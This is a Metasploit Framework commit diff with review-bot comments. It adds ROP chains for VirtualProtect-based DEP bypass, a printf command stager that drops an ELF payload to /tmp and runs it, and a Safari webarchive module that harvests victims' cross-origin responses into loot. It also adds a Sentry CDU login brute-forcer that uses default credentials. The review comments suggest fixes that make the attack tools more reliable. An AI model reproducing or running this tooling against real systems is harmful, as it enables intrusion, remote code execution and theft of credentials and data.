Merge branch 'master' into data_dir

Conflicts:
	lib/msf/core/auxiliary/jtr.rb
Meatballs 2013-10-10 19:55:26 +01:00
commit 9ca9b4ab29
55 changed files with 1176 additions and 395 deletions


@ -7,6 +7,7 @@ hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com> jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com> joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com> jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com> limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>


@ -11,7 +11,7 @@
<gadget offset="0x0001803c">POP EBP # RETN</gadget> <gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget> <gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget> <gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget> <gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget> <gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget> <gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget> <gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
@ -40,7 +40,7 @@
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget> <gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget> <gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget> <gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget> <gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget> <gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget> <gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget> <gadget value="junk">JUNK</gadget>


@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget> <gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget> <gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget> <gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget> <gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget> <gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget> <gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget> <gadget value="0xffffffff"></gadget>
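Review bot: The gadget on the fourth line of this hunk switches its value to the symbolic `safe_negate_size` but keeps the literal description `0x00000201`, which no longer describes what the chain pushes; the sibling ROP files in this commit label the same gadget `Safe size to NEG`. Suggest `<gadget value="safe_negate_size">Safe size to NEG</gadget>` so the description and the value agree.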


@ -7,12 +7,21 @@
</compatibility> </compatibility>
<gadgets base="0x77c10000"> <gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0002ee15">POP EBP # RETN</gadget> <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget> <gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget> <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget> <gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget> <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@ -33,23 +42,29 @@
</compatibility> </compatibility>
<gadgets base="0x77ba0000"> <gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget> <gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget> <gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget> <gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget> <gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget> <gadget offset="0x00029801">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget> <gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget> <gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget> <gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget> <gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget> <gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0004ff56">Writable location</gadget> <gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget> <gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget> <gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget value="nop">nop</gadget> <gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget> <gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets> </gadgets>
</rop> </rop>


@ -37,45 +37,57 @@ module Auxiliary::JohnTheRipper
autodetect_platform autodetect_platform
end end
# @return [String] the run path instance variable if the platform is detectable, nil otherwise.
def autodetect_platform def autodetect_platform
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
return @run_path if @run_path return @run_path if @run_path
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
if File.directory?(cpuinfo_base)
data = nil
case ::RUBY_PLATFORM case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/ when /mingw|cygwin|mswin/
data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil fname = "#{cpuinfo_base}/cpuinfo.exe"
case data if File.exists?(fname) and File.executable?(fname)
when /sse2/ data = %x{"#{fname}"} rescue nil
@run_path ||= "run.win32.sse2/john.exe" end
when /mmx/ case data
@run_path ||= "run.win32.mmx/john.exe" when /sse2/
else @run_path ||= "run.win32.sse2/john.exe"
@run_path ||= "run.win32.any/john.exe" when /mmx/
end @run_path ||= "run.win32.mmx/john.exe"
else
when /x86_64-linux/ @run_path ||= "run.win32.any/john.exe"
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil end
data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil when /x86_64-linux/
case data fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
when /mmx/ if File.exists? fname
@run_path ||= "run.linux.x64.mmx/john" ::FileUtils.chmod(0755, fname) rescue nil
else data = %x{"#{fname}"} rescue nil
@run_path ||= "run.linux.x86.any/john" end
end case data
when /mmx/
when /i[\d]86-linux/ @run_path ||= "run.linux.x64.mmx/john"
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil else
data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil @run_path ||= "run.linux.x86.any/john"
case data end
when /sse2/ when /i[\d]86-linux/
@run_path ||= "run.linux.x86.sse2/john" fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
when /mmx/ if File.exists? fname
@run_path ||= "run.linux.x86.mmx/john" ::FileUtils.chmod(0755, fname) rescue nil
else data = %x{"#{fname}"} rescue nil
@run_path ||= "run.linux.x86.any/john" end
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
end end
end end
@run_path
return @run_path
end end
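Review bot: The new existence checks in `autodetect_platform` use `File.exists?`, a deprecated alias of `File.exist?` (warned since Ruby 2.1, removed in 3.2), and the Windows branch joins it with `and`, which binds looser than `&&` and is discouraged in conditions; prefer `if File.exist?(fname) && File.executable?(fname)` there and `if File.exist?(fname)` in the two Linux branches. The Linux branches only test existence while the Windows branch also tests executability, and every `%x{...} rescue nil` hides whatever went wrong running the cpuinfo helper, so a missing, non-executable or crashing binary silently lands in the `.any` build; a `vprint_status` when `data` is nil would make that fallback visible to the operator. When `cpuinfo_base` is not a directory the method returns nil without setting `@run_path`, which matches the new `@return` comment but means the detection is re-run on every call.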
def john_session_id def john_session_id


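--- /dev/null
+++ b/lib/msf/core/exploit/cmdstager_printf.rb
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+require 'msf/core/exploit/cmdstager'
+module Msf
+####
+# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
+#
+# This stager uses a POSIX-conformant printf, that supports the interpretation
+# of octal escapes, to drop an ELF with the payload embedded to disk.
+####
+module Exploit::CmdStagerPrintf
+include Msf::Exploit::CmdStager
+# Initializes a CmdStagerPrintf instance for the supplied payload
+#
+# @param exe [String] The payload embedded into an ELF
+# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
+def create_stager(exe)
+Rex::Exploitation::CmdStagerPrintf.new(exe)
+end
+end
+end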


@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp' require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne' require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo' require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol # Protocol
require 'msf/core/exploit/tcp' require 'msf/core/exploit/tcp'


@ -44,7 +44,8 @@ class Msf::Module::Author
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org' 'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'joev' => 'joev' + 0x40.chr + 'metasploit.com'
} }
# #


@ -7,3 +7,4 @@ require 'rex/exploitation/cmdstager/debug_asm'
require 'rex/exploitation/cmdstager/tftp' require 'rex/exploitation/cmdstager/tftp'
require 'rex/exploitation/cmdstager/bourne' require 'rex/exploitation/cmdstager/bourne'
require 'rex/exploitation/cmdstager/echo' require 'rex/exploitation/cmdstager/echo'
require 'rex/exploitation/cmdstager/printf'


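--- /dev/null
+++ b/lib/rex/exploitation/cmdstager/printf.rb
@@ -0,0 +1,122 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+require 'shellwords'
+module Rex
+module Exploitation
+class CmdStagerPrintf < CmdStagerBase
+def initialize(exe)
+super
+@var_elf = Rex::Text.rand_text_alpha(5)
+end
+#
+# Override to ensure opts[:temp] is a correct *nix path
+#
+def generate(opts = {})
+opts[:temp] = opts[:temp] || '/tmp/'
+opts[:temp].gsub!(/\\/, '/')
+opts[:temp] = opts[:temp].shellescape
+opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+super
+end
+#
+# Override to set the extra byte count
+#
+def generate_cmds(opts)
+if opts[:noquotes]
+@cmd_start = "printf "
+@cmd_end = ">>#{@tempdir}#{@var_elf}"
+@prefix = '\\\\'
+min_part_size = 5
+else
+@cmd_start = "printf '"
+@cmd_end = "'>>#{@tempdir}#{@var_elf}"
+@prefix = '\\'
+min_part_size = 4
+end
+xtra_len = @cmd_start.length + @cmd_end.length
+opts.merge!({ :extra => xtra_len })
+if (opts[:linemax] - opts[:extra]) < min_part_size
+raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
+end
+super
+end
+#
+# Encode into a "\12\345" octal format that printf understands
+#
+def encode_payload(opts)
+return Rex::Text.to_octal(@exe, @prefix)
+end
+#
+# Override it to ensure that the octal representation of a byte isn't cut
+#
+def slice_up_payload(encoded, opts)
+encoded_dup = encoded.dup
+parts = []
+xtra_len = opts[:extra]
+xtra_len ||= 0
+while (encoded_dup.length > 0)
+temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
+# remove the last octal escape if it is imcomplete
+if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
+pos = temp.rindex('\\')
+pos -= 1 if temp[pos-1] == '\\'
+temp.slice!(pos..temp.length-1)
+end
+parts << temp
+encoded_dup.slice!(0, temp.length)
+end
+parts
+end
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before and after it.
+#
+def parts_to_commands(parts, opts)
+parts.map do |p|
+@cmd_start + p + @cmd_end
+end
+end
+#
+# Since the binary has been already dropped to disk, just execute and
+# delete it
+#
+def generate_cmds_decoder(opts)
+cmds = []
+# Make it all happen
+cmds << "chmod +x #{@tempdir}#{@var_elf}"
+cmds << "#{@tempdir}#{@var_elf}"
+# Clean up after unless requested not to..
+unless opts[:nodelete]
+cmds << "rm -f #{@tempdir}#{@var_elf}"
+end
+return cmds
+end
+def cmd_concat_operator
+" ; "
+end
+end
+end
+end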
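Review bot: `generate` edits the caller's `opts[:temp]` string in place (`gsub!` and `<<`), so a caller that keeps a reference sees its path mutated, and a second `generate` call with the same hash would `shellescape` an already-escaped value; build a fresh string instead, `temp = (opts[:temp] || '/tmp/').tr('\\', '/').shellescape`, `temp << '/' unless temp.end_with?('/')`, `opts[:temp] = temp`. In `slice_up_payload`, `pos = temp.rindex('\\')` is used without a nil check and `temp[pos-1]` wraps to the last character when `pos` is 0; the `min_part_size` guard in `generate_cmds` makes that unlikely, but wrapping the trim in `if pos` would keep an odd `:linemax` from surfacing as a NoMethodError. The comment above that check also misspells `imcomplete`.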


@ -29,7 +29,7 @@ class RopDb
# #
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or # Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size, # some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
# and :size_negate. # :unsafe_negate_size, and :safe_negate_size
# Note if no RoP is found, it returns an empry array. # Note if no RoP is found, it returns an empry array.
# Arguments: # Arguments:
# rop_name - name of the ROP chain. # rop_name - name of the ROP chain.
@ -90,8 +90,10 @@ class RopDb
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
elsif e == :size elsif e == :size
payload.length payload.length
elsif e == :size_negate elsif e == :unsafe_negate_size
0xffffffff - payload.length + 1 get_unsafe_size(payload.length)
elsif e == :safe_negate_size
get_safe_size(payload.length)
else else
e e
end end
@ -105,6 +107,28 @@ class RopDb
private private
#
# Returns a size that's safe from null bytes.
# This function will keep incrementing the value of "s" until it's safe from null bytes.
#
def get_safe_size(s)
safe_size = get_unsafe_size(s)
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
safe_size -= 1
end
safe_size
end
#
# Returns a size that might contain one or more null bytes
#
def get_unsafe_size(s)
0xffffffff - s + 1
end
# #
# Checks if a ROP chain is compatible # Checks if a ROP chain is compatible
# #
@ -146,8 +170,10 @@ class RopDb
gadgets << :junk gadgets << :junk
when 'size' when 'size'
gadgets << :size gadgets << :size
when 'size_negate' when 'unsafe_negate_size'
gadgets << :size_negate gadgets << :unsafe_negate_size
when 'safe_negate_size'
gadgets << :safe_negate_size
else else
gadgets << value.to_i(16) gadgets << value.to_i(16)
end end
@ -160,4 +186,4 @@ class RopDb
end end
end end
end end
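Review bot: The header comment on the new `get_safe_size` says the function keeps incrementing `s`, but the loop does `safe_size -= 1`, so the negated size is walked downward until no byte is `0x00`; since NEG of `0xffffffff - s + 1 - k` is `s + k`, the size the chain ends up with is slightly larger than `payload.length`, which is exactly why decrementing is the safe direction, and the comment should state that, e.g. `# Decrements the negated size until no byte is 0x00; after NEG the result is >= the payload length.`. The context comment earlier in this section still reads `empry array` and could be fixed while this doc block is being touched.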


@ -42,10 +42,13 @@ class MultiCaller
include DLLHelper include DLLHelper
def initialize( client, parent ) def initialize( client, parent, win_consts )
@parent = parent @parent = parent
@client = client @client = client
# needed by DLL helper
@win_consts = win_consts
if( @client.platform =~ /x64/i ) if( @client.platform =~ /x64/i )
@native = 'Q' @native = 'Q'
else else
@ -224,9 +227,17 @@ class MultiCaller
rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT) rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT)
rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET) rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET)
rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR) rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR)
rec_err_msg = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_MSG)
# Error messages come back with trailing CRLF, so strip it out
# if we do get a message.
rec_err_msg.strip! if not rec_err_msg.nil?
# The hash the function returns # The hash the function returns
return_hash={"GetLastError" => rec_last_error} return_hash = {
"GetLastError" => rec_last_error,
"ErrorMessage" => rec_err_msg
}
#process return value #process return value
case function.return_type case function.return_type
@ -303,8 +314,6 @@ class MultiCaller
protected protected
attr_accessor :win_consts
end # MultiCall end # MultiCall
end; end; end; end; end; end end; end; end; end; end; end
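Review bot: `rec_err_msg.strip! if not rec_err_msg.nil?` in the second hunk is the `if not` form the style guide flags; `rec_err_msg.strip! unless rec_err_msg.nil?` says the same thing. The first hunk also turns `win_consts` into a required third positional argument of `initialize`, so any `MultiCaller.new(client, parent)` caller outside this diff now raises ArgumentError; `Railgun#multi` is updated in this commit, but a default such as `win_consts = nil` would keep older callers working, and the existing `# needed by DLL helper` comment should name which DLLHelper methods read it so the dependency is traceable.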


@ -290,7 +290,7 @@ class Railgun
# #
def multi(functions) def multi(functions)
if @multicaller.nil? if @multicaller.nil?
@multicaller = MultiCaller.new(client, self) @multicaller = MultiCaller.new(client, self, ApiConstants.manager)
end end
return @multicaller.call(functions) return @multicaller.call(functions)


@ -12,6 +12,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
# [Array<Array<Hash>>] list of poisonable scripts per user-specified URLS # [Array<Array<Hash>>] list of poisonable scripts per user-specified URLS
attr_accessor :scripts_to_poison attr_accessor :scripts_to_poison
@ -177,17 +178,39 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request) def on_request_uri(cli, request)
begin begin
data = if request.body.size > 0 data_str = if request.body.size > 0
request.body request.body
else else
request.qstring['data'] request.qstring['data']
end end
data = JSON::parse(data || '') data = JSON::parse(data_str || '')
print_status "Received data: #{data}" file = record_data(data, cli)
rescue # json error, dismiss request & keep crit. server up send_response_html(cli, '')
print_good "#{data_str.length} chars received and stored to #{file}"
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
print_error "Invalid JSON received: #{data_str}"
send_not_found(cli)
end end
end end
# @param [Hash] data the data to store in the log
# @return [String] filename where we are storing the data
def record_data(data, cli)
@client_cache ||= Hash.new({})
@client_cache[cli.peerhost]['file'] ||= store_loot(
"safari.client", "text/plain", cli.peerhost, '', "safari_webarchive", "Webarchive Collected Data"
)
file = @client_cache[cli.peerhost]['file']
@client_cache[cli.peerhost]['data'] ||= []
@client_cache[cli.peerhost]['data'].push(data)
data_str = JSON.generate(@client_cache[cli.peerhost]['data'])
File.write(file, data_str)
file
end
### ASSEMBLE THE WEBARCHIVE XML ### ### ASSEMBLE THE WEBARCHIVE XML ###
# @return [String] contents of webarchive as an XML document # @return [String] contents of webarchive as an XML document
@ -531,9 +554,11 @@ class Metasploit3 < Msf::Auxiliary
var sent = false; var sent = false;
req.open('GET', '#{url}', true); req.open('GET', '#{url}', true);
req.onreadystatechange = function() { req.onreadystatechange = function() {
if (!sent) { if (req.readyState==4 && !sent) {
sendData('response_headers', req.getAllResponseHeaders()); sendData('#{url}', {
sendData('response_body', req.responseText); response_headers: req.getAllResponseHeaders(),
response_body: req.responseText
});
sent = true; sent = true;
} }
}; };
@ -647,8 +672,7 @@ class Metasploit3 < Msf::Auxiliary
%Q| %Q|
window.sendData = function(key, val) { window.sendData = function(key, val) {
var data = {}; var data = {};
if (key && val) data[key] = val; data[key] = val;
if (!val) data = key;
window.top.postMessage(JSON.stringify(data), "*") window.top.postMessage(JSON.stringify(data), "*")
}; };
| |
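Review bot: `@client_cache ||= Hash.new({})` in the new `record_data` shares one default hash across every missing key, and `@client_cache[cli.peerhost]['file'] ||= ...` writes into that default object without ever assigning `@client_cache[cli.peerhost]`, so every client reads and writes the same `'file'` and `'data'` entries and all peers' data is appended to the first peer's loot file. Use a default block that stores the per-key hash: `@client_cache ||= Hash.new { |h, k| h[k] = {} }`. In `on_request_uri` the rescue binds `e` without using it (`rescue JSON::ParserError` suffices), and `print_error "Invalid JSON received: #{data_str}"` echoes the raw request body to the console; truncating it, for example `data_str.to_s[0, 200].inspect`, keeps a malformed or oversized body from flooding the log.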


@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
out, filename = fingerprint(res) out, filename = fingerprint(res)
print_status("#{peer} #{out}") if out print_status("#{peer} #{out}") if out
if(out =~ /Not Vulnerable/) if(out =~ /Not Vulnerable/)
print_status("#{peer} isn't vulnerable to this attack") print_status("#{peer} isn't vulnerable to this attack")
return return
end end


@ -124,6 +124,7 @@ class Metasploit3 < Msf::Auxiliary
query = @res.search(host, "A") query = @res.search(host, "A")
if query if query
query.answer.each do |rr| query.answer.each do |rr|
next unless rr.type == "A"
record = {} record = {}
record[:host] = host record[:host] = host
record[:type] = "A" record[:type] = "A"
@ -134,6 +135,7 @@ class Metasploit3 < Msf::Auxiliary
query1 = @res.search(host, "AAAA") query1 = @res.search(host, "AAAA")
if query1 if query1
query1.answer.each do |rr| query1.answer.each do |rr|
next unless rr.type == "AAAA"
record = {} record = {}
record[:host] = host record[:host] = host
record[:type] = "AAAA" record[:type] = "AAAA"
@ -189,6 +191,7 @@ class Metasploit3 < Msf::Auxiliary
query = @res.query(target, "TXT") query = @res.query(target, "TXT")
return results if not query return results if not query
query.answer.each do |rr| query.answer.each do |rr|
next unless rr.type == "TXT"
record = {} record = {}
record[:host] = target record[:host] = target
record[:text] = rr.txt record[:text] = rr.txt


@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def gen_blank_passwords(users, credentials) def gen_blank_passwords(users, credentials)
return credentials return credentials
end end
def run_host(ip) def run_host(ip)


@ -0,0 +1,112 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Sentry Switched CDU Bruteforce Login Utility',
'Description' => %{
This module scans for ServerTech's Sentry Switched CDU (Cabinet Power
Distribution Unit) web login portals, and performs login brute force
to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'admn'", "admn"]),
OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'admn'", "admn"])
], self.class)
end
def run_host(ip)
unless is_app_sentry?
print_error("#{rhost}:#{rport} - Sentry Switched CDU not found. Module will not continue.")
return
end
print_status("#{rhost}:#{rport} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the app actually isn't Sentry
#
def is_app_sentry?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
return false
end
if (res and res.body.include?("Sentry Switched CDU"))
vprint_good("#{rhost}:#{rport} - Running ServerTech Sentry Switched CDU")
return true
else
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/index.html',
'method' => 'GET',
'authorization' => basic_auth(user,pass)
})
if (res and res.headers['Set-Cookie'])
print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'ServerTech Sentry Switched CDU',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
return :abort
end
end
end
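Review bot: `do_login` treats any response carrying a `Set-Cookie` header as a successful login, but a 401 or a redirect back to the login page can also set a session cookie, so the module can report and store credentials that were never accepted; check the status as well, `if res && res.code == 200 && res.headers['Set-Cookie']`, and ideally a body marker that only appears once authenticated. The `PASSWORD` option description misspells `deault`, and `is_app_sentry?` should drop the `is_` prefix (`sentry_app?`) per the Ruby style guide. `do_login` returns `:next_user` on success but falls off the end with nil on failure; returning `:next_pass` there (or documenting the nil) would make the contract with `each_user_pass` explicit.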


@ -39,9 +39,14 @@ class Metasploit3 < Msf::Auxiliary
'References' => 'References' =>
[ [
[ 'CVE', '1999-0506'], # Weak password [ 'CVE', '1999-0506'], # Weak password
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'DB_ALL_CREDS' => false,
'BLANK_PASSWORDS' => false,
'USER_AS_PASS' => false
}
) )
deregister_options('RHOST','USERNAME','PASSWORD') deregister_options('RHOST','USERNAME','PASSWORD')


@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
